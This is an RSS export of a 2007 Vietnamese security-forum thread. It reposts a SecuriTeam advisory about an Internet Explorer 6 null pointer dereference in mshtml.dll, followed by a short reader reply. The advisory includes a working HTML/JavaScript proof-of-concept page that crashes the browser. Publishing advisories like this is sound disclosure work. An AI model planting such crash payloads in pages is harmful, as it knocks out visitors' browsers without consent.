<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title><![CDATA[Latest posts for the topic "MS IE 6 Null Pointer Dereference Exploit (mshtml.dll)"]]></title>
		<link>http://www.hvaonline.net/hvaonline/posts/list/13.hva</link>
		<description><![CDATA[Latest messages posted in the topic "MS IE 6 Null Pointer Dereference Exploit (mshtml.dll)"]]></description>
		<generator>JForum - http://www.jforum.net</generator>
			<item>
				<title>MS IE 6 Null Pointer Dereference Exploit (mshtml.dll)</title>
				<description><![CDATA[ The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site:<span class="link"> http://www.securiteam.com</span>
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.<span class="link"> http://www.securiteam.com/mailinglist.html</span> 

- - - - - - - - -



  MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll)
------------------------------------------------------------------------


<b>SUMMARY</b>
Microsoft Internet Explorer version 6 crashes when you open the attached 
HTML page, this is due to its attempt to dereference a NULL pointer.

<b>DETAILS</b>
<b>Vulnerable Systems:</b>
<font color='red'> * Microsoft Internet Explorer version 6.0.2800.1106; SP1 (Windows 2000 
Advanced Server)
 * Microsoft Internet Explorer version 6.0.2900.2180.xpsp.050928-1517;SP2 
(Windows XP Pro)</font>

<b>Exploit:</b>
&lt;!--
+ Title: Microsoft Internet Explorer Malformed HTML Null Pointer 
Dereference Vulnerability (mshtml.dll) (0-day)

+ Bug discovered & exploit coded by AmesianX in powerhacker.net (YoungHo 
Park - amesianx@gmail.com)

+ Critical: Critical

+ Impact: MS Internet Explorer 6 -&gt; Crash (Denial of Service)

+ Where: From remote

+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
                                          Windows 2000 Advanced Server 
(Korean Language)

+ Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 
(Windows 2000 Advanced Server)
                            Microsoft Internet Explorer 
Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)

+ Solution: <b>Not Patched</b> (zero-day)

+ Description:
  The following bug was tested on the latest version of Internet Explorer 
6 on a fully-patched
  Windows XP SP2 system. this bug will crash when executing a 'for' 
scripts.

+ The following proof-of-concept is also available:
   &lt;http://www.powerhacker.net/exploit/IE_NULL_CRASH.html&gt; <span class="link"> http://www.powerhacker.net/exploit/IE_NULL_CRASH.html</span>
--&gt;

<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>&lt;html&gt;
 &lt;head&gt;
  &lt;title&gt; AmesianX, RC_No1 in powerhacker.net &#40;amesianx@gmail.com, 
RC_No1@gmail.com&#41;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
  &lt;script language='javascript'&gt;
   var data = document&#91;'getElementById'&#93;;
   for&#40;var key in data&#41;;
  &lt;/script&gt;
 &lt;/body&gt;
&lt;/html&gt;</pre>
		</div>


<b>ADDITIONAL INFORMATION</b>
The original article can be found at:  
&lt;hxxp://www.milw0rm.com/exploits/3272&gt; <span class="link"> hxxp://www.milw0rm.com/exploits/3272</span>]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/6996.hva#40703</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/6996.hva#40703</link>
				<pubDate><![CDATA[Thu, 8 Feb 2007 08:02:57]]> GMT</pubDate>
				<author><![CDATA[ conmale]]></author>
			</item>
			<item>
				<title>Re:MS IE 6 Null Pointer Dereference Exploit (mshtml.dll)</title>
				<description><![CDATA[ Đệ chẳng hiểu mô tê gì cả huynh ơi :?) 
Hì nhưng mà đệ khoái đọc các bài mà huynh viết lém :x) ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/6996.hva#40704</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/6996.hva#40704</link>
				<pubDate><![CDATA[Thu, 8 Feb 2007 08:26:51]]> GMT</pubDate>
				<author><![CDATA[ ivanut]]></author>
			</item>
	</channel>
</rss>
